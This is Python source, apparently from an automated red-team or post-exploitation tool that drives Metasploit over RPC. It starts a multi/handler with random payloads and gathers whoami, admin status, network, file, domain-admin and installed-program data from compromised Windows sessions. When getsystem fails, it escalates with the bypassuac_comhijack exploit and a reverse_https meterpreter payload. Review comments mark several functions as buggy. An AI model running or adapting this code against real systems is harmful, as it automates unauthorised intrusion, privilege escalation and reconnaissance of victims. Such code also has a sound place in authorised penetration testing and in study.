def deleteSessions():
    ''' deletes all session data: every Session, EscalationData and Recon document '''
    # same order as before: sessions first, then escalation data, then recon
    for collection in (Session, EscalationData, Recon):
        collection.objects().delete()
def gatherWhoAmI(self, msfclient, sessionInput):
    ''' runs `whoami` on a session and stores the result on the session's Recon document

    self: passed through to EventUtils.settingEvent for event logging.
    msfclient: wrapper exposing a msfrpc-style `.client` and a `.console` id.
    sessionInput: session id; used as a string in messages and as the
        Session/Recon document key.
    Nothing propagates: MsfError kills the session, any other exception is
    only logged.
    '''
    EventUtils.settingEvent(self, "Gathering whoami data from session " + sessionInput +".")
    try:
        whoami_input = []
        whoami = msfclient.client.sessions.session(sessionInput).run_psh_cmd("whoami", timeout=30)
        session = Session.objects(_id=sessionInput).first()
        if session:
            recon = Recon.objects(session_id=sessionInput).first()
            if recon:
                # NOTE(review): takes the second output line here, while the
                # new-Recon branch below keeps the last non-empty line; output
                # with fewer than two lines raises IndexError, which the
                # generic handler below only logs.
                whoami_input = whoami.splitlines()
                recon.whoami = whoami_input[1]
            else:
                # first recon for this session: create it and link it to the session
                recon = Recon()
                recon.session_id = sessionInput
                recon._id = sessionInput
                session.recon_id.append(recon.session_id)
                # keep the last non-empty output line
                for lines in whoami.splitlines():
                    if lines == '':
                        pass
                    else:
                        recon.whoami = lines
            recon.save()
            session.save()
            EventUtils.settingEvent(self, "whoami data for session " +sessionInput+ ": " +recon.whoami+".")
    except MsfError:
        # RPC timeout: the session is killed rather than retried
        print(f"[!]Session {sessionInput} threw timeout error.")
        print("[!]Killing session...")
        msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
        time.sleep(10)
        pass
    except Exception as msg:
        # best-effort: the error is logged and swallowed
        logger.info(msg)
        print("There was an error!")
        pass
def gatherCurrentAdmin(self, msfclient, sessionInput):
    ''' runs `net sessions` on a session and records on its Recon whether access was denied

    self: passed through to EventUtils.settingEvent for event logging.
    msfclient: wrapper exposing a msfrpc-style `.client` and a `.console` id.
    sessionInput: session id; used as a string in messages and as the
        Session/Recon document key.
    Only MsfError is handled (session is killed); other exceptions propagate
    to the caller, unlike most sibling gather* methods.
    '''
    EventUtils.settingEvent(self, "Gathering current admin on session " + sessionInput + ".")
    try:
        admin = msfclient.client.sessions.session(sessionInput).run_psh_cmd("net sessions", timeout=30)
        session = Session.objects(_id=sessionInput).first()
        if session:
            recon = Recon.objects(session_id=sessionInput).first()
            if recon:
                # NOTE(review): isAdmin is reassigned for every output line,
                # so only the last line decides the stored value.
                for lines in admin.splitlines():
                    if not 'Access is denied.' in lines:
                        recon.isAdmin = True
                    else:
                        recon.isAdmin = False
            else:
                # first recon for this session: create it and link it to the session
                recon = Recon()
                recon.session_id = sessionInput
                recon._id = sessionInput
                session.recon_id.append(recon.session_id)
                # same per-line overwrite as above, with an event per line
                for lines in admin.splitlines():
                    if not 'Access is denied.' in lines:
                        EventUtils.settingEvent(self, "Session "+sessionInput+" is admin.")
                        recon.isAdmin = True
                    else:
                        EventUtils.settingEvent(self, "Session "+sessionInput+" is not admin.")
                        recon.isAdmin = False
            recon.save()
            session.save()
    except MsfError:
        # RPC timeout: the session is killed rather than retried
        print(f"[!]Session {sessionInput} threw timeout error.")
        print("[!]Killing session...")
        msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
        time.sleep(10)
        pass
def __init__(self, msfclient): self.msfclient = msfclient # starting mongo global_init() # clearing sessions for new sessions svc.deleteSessions() print("[!]Starting Automation...") EventUtils.settingEvent(self, "Starting automation!") msfrpcdHandler() if self.msfclient.connect() is False: sys.exit() sessionMod(self.msfclient).sessionPrint() # NEED TO IMPROVE THIS session = Session.objects() if session: sessionMod(self.msfclient).activeSessionController() else: print("[!]Running exploit: exploit/multi/handler") exploit = self.msfclient.client.modules.use('exploit', 'exploit/multi/handler') time.sleep(5) exploit['ExitOnSession'] = False time.sleep(2) randomPayload = random.choice(self.choose_payload) print("[!]Using payload: ", randomPayload) _payload = self.msfclient.client.modules.use('payload', randomPayload) time.sleep(2) _payload['LHOST'] = '0.0.0.0' _payload['LPORT'] = '4444' time.sleep(5) exploit.execute(payload=_payload) print("[!]Executing exploit on port ", _payload['LPORT']) time.sleep(10) sessionMod(self.msfclient).activeSessionController()
def checkDisconnected(dictionary):
    ''' checks if a session is disconnected

    dictionary: the currently live sessions; only its emptiness and its
        .items() are consulted.
    Walks the module-level session_list (not defined in this block) and
    sets isDisconnected=True on each matching Session document.
    '''
    if not session_list:
        pass
    else:
        if not dictionary:
            # no live sessions at all: mark every known session disconnected
            for s in session_list:
                session = Session.objects(_id=s).first()
                session.isDisconnected = True
                session.save()
        # NOTE(review): .items() yields (key, value) tuples, so a plain
        # session id never compares equal to one and this condition is
        # always true — every session in session_list is marked
        # disconnected (and, when dictionary is empty, saved twice).
        # Presumably the intended test is against the keys; confirm with
        # the caller that builds `dictionary`.
        for s_id in session_list:
            if s_id not in dictionary.items():
                session = Session.objects(_id=s_id).first()
                session.isDisconnected = True
                session.save()
def gatherFiles(self, msfclient, sessionInput):
    ''' runs `ls` on a session and records the listing under the Recon directory entry for the current pwd

    self: passed to EventUtils.settingEvent; also supplies parseFileData and
        checkingFileChanges (defined elsewhere on the class).
    msfclient: wrapper exposing a msfrpc-style `.client` and a `.console` id.
    sessionInput: session id; used as a string in messages and as the
        Session/Recon document key.
    Nothing propagates: MsfError kills the session, any other exception is
    only logged.
    '''
    EventUtils.settingEvent(self, "Gathering file info from session " + sessionInput + ".")
    try:
        # column names zipped against each parsed `ls` row
        desc_files = ['Mode', 'Size', 'Type', 'Last', 'Modified', 'TimeZone', 'Name']
        listofFiles = msfclient.client.sessions.session(sessionInput).run_with_output('ls', timeout=30).splitlines()
        session = Session.objects(_id=sessionInput).first()
        if session:
            recon = Recon.objects(_id=sessionInput).first()
            if not recon:
                # gatherPWD creates the Recon and its first directory entry
                Reconnaissance.gatherPWD(self, msfclient, sessionInput)
                recon = Recon.objects(_id=sessionInput).first()
            # NOTE(review): this filter is not restricted to this session, so
            # it matches every Recon document whose directory list contains
            # a dir named like recon.pwd.
            directory = Recon.objects().filter(directory__dir_name=recon.pwd)
            if directory:
                for r in directory:
                    for d in r.directory:
                        if not d.gathered:
                            # first listing for this directory: store every parsed row
                            d.gathered = True
                            for f in listofFiles:
                                file = self.parseFileData(f)
                                if not file:
                                    pass
                                else:
                                    files_mapped = dict(zip(desc_files, file))
                                    d.files.append(files_mapped)
                            r.save()
                        else:
                            # already listed once: diff against the stored names
                            current_files = []
                            for _dict in d.files:
                                current_files.append(_dict['Name'])
                            for f in listofFiles:
                                file = self.parseFileData(f)
                                if not file:
                                    pass
                                else:
                                    #First check if the file is in the dict
                                    # file[6] is the 'Name' column (see desc_files)
                                    if file[6] in current_files:
                                        for found_dict in d.files:
                                            if file[6]==found_dict['Name']:
                                                self.checkingFileChanges(file, found_dict)
                                            else:
                                                pass
                                    else:
                                        #if not, add the new file info in the dict
                                        files_mapped = dict(zip(desc_files, file))
                                        d.files.append(files_mapped)
                            r.save()
    except MsfError:
        # RPC timeout: the session is killed rather than retried
        print(f"[!]Session {sessionInput} threw timeout error.")
        print("[!]Killing session...")
        msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
        time.sleep(10)
        pass
    except Exception as msg:
        # best-effort: the error is logged and swallowed
        logger.info(msg)
        print(msg)
        pass
def gatherDomain(self, msfclient, sessionInput):
    ''' runs the enum_domain and enum_domain_group_users post modules on a session and parses their output

    self: passed through to EventUtils.settingEvent for event logging.
    msfclient: wrapper exposing a msfrpc-style `.client` and a `.console` id.
    sessionInput: session id; used as a string in messages and as the
        Session/Recon document key.
    Nothing propagates: MsfError kills the session, any other exception is
    only printed.
    '''
    try:
        EventUtils.settingEvent(self, "Gathering domain info from session " + sessionInput + ".")
        domain = ""
        # placeholder values, overwritten when a "Controller:" line is parsed
        user_list = {'User': '******', 'IP': '0.0.0.0'}
        domain_user = []
        post = msfclient.client.modules.use('post', 'windows/gather/enum_domain')
        post['SESSION'] = sessionInput
        cid = msfclient.console
        run_enum_domain = msfclient.client.consoles.console(cid).run_module_with_output(post)
        for line in run_enum_domain.splitlines():
            if '[-]' in line:
                print("[-] Issue gathering domain info!")
            else:
                if line.find("Domain: ") != -1:
                    domain = line.split("Domain: ",1)[1]
                elif line.find("Controller: ") != -1:
                    # assumes the text after "Controller: " has at least three
                    # whitespace-separated fields, the third ending in ')' — confirm
                    domain_user_info = line.split("Controller: ", 1)[1].split()
                    user_list['User'] = domain_user_info[0].upper()
                    user_list['IP'] = domain_user_info[2].replace(')', '')
                else:
                    # any line that is neither Domain nor Controller is reported as an issue
                    print("[-] Issue gathering domain info!")
        post = msfclient.client.modules.use('post', 'windows/gather/enum_domain_group_users')
        post['GROUP'] = 'domain admins'
        post['SESSION'] = sessionInput
        # NOTE(review): every other call goes through msfclient.client.consoles;
        # this one omits `.client` — confirm the wrapper exposes `consoles`
        # directly, otherwise this raises and ends up in the generic except.
        run_enum_domain_group_users = msfclient.consoles.console(cid).run_module_with_output(post)
        for line in run_enum_domain_group_users.splitlines():
            if domain in line:
                # keeps the part after the first backslash; skips lines containing 'not'
                users = line.split('\\')[1]
                if 'not' in users:
                    pass
                else:
                    domain_user.append(users)
        session = Session.objects(_id=sessionInput).first()
        if session:
            recon = Recon.objects(_id=sessionInput).first()
            if recon is None:
                # NOTE(review): unlike the other gather* methods, a new Recon
                # created here gets no _id/session_id and is not linked to the session.
                recon = Recon()
            # NOTE(review): recon_domain is populated but no line attaches it
            # to recon, so recon.save() persists none of the values parsed above.
            recon_domain = ReconDomain()
            recon_domain.domain = domain
            recon_domain.domain_controller = user_list
            recon_domain.domain_user = domain_user
            recon.save()
    except MsfError:
        # RPC timeout: the session is killed rather than retried
        print(f"[!]Session {sessionInput} threw timeout error.")
        print("[!]Killing session...")
        msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
        time.sleep(10)
        pass
    except Exception as msg:
        # best-effort: the error is printed and swallowed
        print(msg)
def getElevated(self, msfclient, sessionInput):
    ''' records an EscalationData document for a session, running getsystem when none exists yet

    self: passed through to EventUtils.settingEvent for event logging.
    msfclient: wrapper exposing a msfrpc-style `.client`.
    sessionInput: session id; used as a string in messages, as the
        Session/EscalationData document key and, cast to int, as the
        exploit SESSION option.
    Every exception is printed and swallowed; there is no MsfError branch
    here, so an RPC timeout does not kill the session as in the gather* methods.
    '''
    try:
        EventUtils.settingEvent(
            self, "Trying to get elevated on session" + sessionInput + ".")
        session = Session.objects(_id=sessionInput).first()
        if session:
            esc = EscalationData.objects(_id=sessionInput).first()
            if esc:
                # an existing record is treated as "already elevated"; nothing is re-checked
                EventUtils.settingEvent(
                    self, "[" + sessionInput + "] You currently own the system.")
                print("[!]You own the system.")
            else:
                EventUtils.settingEvent(
                    self, "[" + sessionInput + "] Attempting to elevate via getsystem...")
                esc = EscalationData()
                getsystem = msfclient.client.sessions.session(
                    sessionInput).run_with_output(
                    'getsystem').splitlines()
                # NOTE(review): empty output raises IndexError here, which the
                # generic except below only prints.
                if '[-]' in getsystem[0]:
                    EventUtils.settingEvent(
                        self, "[" + sessionInput + "] Attempting bypassuac_comijack...")
                    print(
                        "[!]Failed getsystem. Trying bypassuac_comijack..."
                    )
                    exploit = msfclient.client.modules.use(
                        'exploit', 'exploit/windows/local/bypassuac_comhijack')
                    exploit['SESSION'] = int(sessionInput)
                    payload = msfclient.client.modules.use(
                        'payload', 'windows/x64/meterpreter/reverse_https')
                    # LPORT is an int here but a string in the handler setup elsewhere
                    payload['LHOST'] = "0.0.0.0"
                    payload['LPORT'] = 4444
                    exploit.execute(payload=payload)
                    # NOTE(review): getsystem is set True on both branches of
                    # the '[-]' check, so the flag records that elevation was
                    # attempted, not that it succeeded; the execute() result
                    # is not inspected.
                    esc.getsystem = True
                    session.esc_id.append(esc._id)
                else:
                    EventUtils.settingEvent(
                        self, "[" + sessionInput + "] You currently own the system.")
                    print("[+]Gained system. Start gaining info")
                    # esc._id is never assigned on the new EscalationData;
                    # presumably the model supplies one — confirm
                    session.esc_id.append(esc._id)
                    esc.getsystem = True
            esc.save()
            session.save()
    except Exception as msg:
        # best-effort: the error is printed and swallowed
        print(msg)
        pass
def gatherInstalledPrograms(self, msfclient, sessionInput):
    ''' runs the enum_applications post module on a session and stores parsed rows on its Recon

    self: passed to EventUtils.settingEvent; also supplies parseProgramList
        (defined elsewhere on the class).
    msfclient: wrapper exposing a msfrpc-style `.client` and a `.console` id.
    sessionInput: session id; used as a string in messages and as the
        Session/Recon document key.
    Nothing propagates: MsfError kills the session, any other exception is
    only logged.
    '''
    try:
        EventUtils.settingEvent(self, "Gathering installed program info from session " + sessionInput +".")
        # column names zipped against each parsed row
        program_desc = ['Name', 'Version']
        # unused in this block
        current_programs = []
        session = Session.objects(_id=sessionInput).first()
        # the module is run before the session lookup is checked, so it
        # executes even when no Session document exists; output is read
        # after a fixed 10 s wait rather than via run_with_output
        msfclient.client.sessions.session(sessionInput).write('run post/windows/gather/enum_applications')
        time.sleep(10)
        run_post = msfclient.client.sessions.session(sessionInput).read()
        listofPrograms = run_post.splitlines()
        if session:
            recon = Recon.objects(_id=sessionInput).first()
            if recon is None:
                # first recon for this session: created and linked, but the
                # parsed programs are only stored on the else branch below
                recon = Recon()
                recon._id = sessionInput
                recon.session_id = sessionInput
                session.recon_id.append(recon.session_id)
            else:
                for p in listofPrograms:
                    program = self.parseProgramList(p)
                    if not program:
                        pass
                    else:
                        programs_mapped = dict(zip(program_desc, program))
                        if not recon.gathered_programs:
                            recon.installedprg.append(programs_mapped)
                        else:
                            # NOTE(review): `list` shadows the builtin. The check
                            # compares dict *keys* ('Name'/'Version'), not program
                            # names; for entries built by the zip above every key
                            # is present, so nothing new is ever appended here.
                            for list in recon.installedprg:
                                for key, value in list.items():
                                    if key in programs_mapped:
                                        pass
                                    else:
                                        recon.installedprg.append(programs_mapped)
                recon.gathered_programs = True
            recon.save()
            session.save()
    except MsfError:
        # RPC timeout: the session is killed rather than retried
        print(f"[!]Session {sessionInput} threw timeout error.")
        print("[!]Killing session...")
        msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
        time.sleep(10)
        pass
    except Exception as msg:
        # best-effort: the error is logged and swallowed
        logger.info(msg)
        print(msg)
        pass
def gatherNetwork(self, msfclient, sessionInput):
    ''' runs `ipconfig /all` on a session and hands the output to parseIPData for its Recon

    self: passed to EventUtils.settingEvent; also supplies parseIPData
        (defined elsewhere on the class).
    msfclient: wrapper exposing a msfrpc-style `.client` and a `.console` id.
    sessionInput: session id; used as a string in messages and as the
        Session/Recon document key.
    Only MsfError is handled (session is killed); other exceptions propagate
    to the caller, unlike most sibling gather* methods.
    '''
    EventUtils.settingEvent(self, "Gathering network info on session " + sessionInput + ".")
    try:
        session = Session.objects(_id=sessionInput).first()
        # the command runs before the session lookup is checked
        ip = msfclient.client.sessions.session(sessionInput).run_psh_cmd("ipconfig /all", timeout=30)
        if session:
            recon = Recon.objects(session_id=sessionInput).first()
            if recon:
                self.parseIPData(recon, ip)
            else:
                # first recon for this session: create it and link it to the session
                recon = Recon()
                recon.session_id = sessionInput
                recon._id = sessionInput
                session.recon_id.append(recon.session_id)
                self.parseIPData(recon, ip)
            recon.save()
            session.save()
    except MsfError:
        # RPC timeout: the session is killed rather than retried
        print(f"[!]Session {sessionInput} threw timeout error.")
        print("[!]Killing session...")
        msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
        time.sleep(10)
        pass
def gatherPWD(self, msfclient, sessionInput):
    ''' runs `pwd` on a session and stores it on its Recon, adding a ReconFiles entry when the directory changed

    self: passed through to EventUtils.settingEvent for event logging.
    msfclient: wrapper exposing a msfrpc-style `.client` and a `.console` id.
    sessionInput: session id; used as a string in messages and as the
        Session/Recon document key.
    Nothing propagates: MsfError kills the session, any other exception is
    only logged.
    '''
    EventUtils.settingEvent(self, "Gathering pwd from session " + sessionInput + ".")
    try:
        # stored and compared as returned, without stripping — confirm
        # run_with_output does not include a trailing newline
        current_pwd = msfclient.client.sessions.session(sessionInput).run_with_output('pwd', timeout=30)
        session = Session.objects(_id=sessionInput).first()
        if session:
            recon = Recon.objects(session_id=sessionInput).first()
            if recon:
                if recon.pwd == current_pwd:
                    # unchanged directory: nothing to record
                    pass
                else:
                    # directory changed: update pwd and append a new directory entry
                    recon.pwd = current_pwd
                    reconfiles = ReconFiles()
                    reconfiles.dir_name = current_pwd
                    recon.directory.append(reconfiles)
            else:
                # first recon for this session: create it, link it, and record the first directory
                recon = Recon()
                recon.session_id = sessionInput
                recon._id = sessionInput
                session.recon_id.append(recon.session_id)
                recon.pwd = current_pwd
                reconfiles = ReconFiles()
                reconfiles.dir_name = current_pwd
                recon.directory.append(reconfiles)
            recon.save()
            session.save()
    except MsfError:
        # RPC timeout: the session is killed rather than retried
        print(f"[!]Session {sessionInput} threw timeout error.")
        print("[!]Killing session...")
        msfclient.client.consoles.console(msfclient.console).write(f'sessions -k {sessionInput}')
        time.sleep(10)
        pass
    except Exception as msg:
        # best-effort: the error is logged and swallowed
        logger.info(msg)
        print("There was an error!")
        pass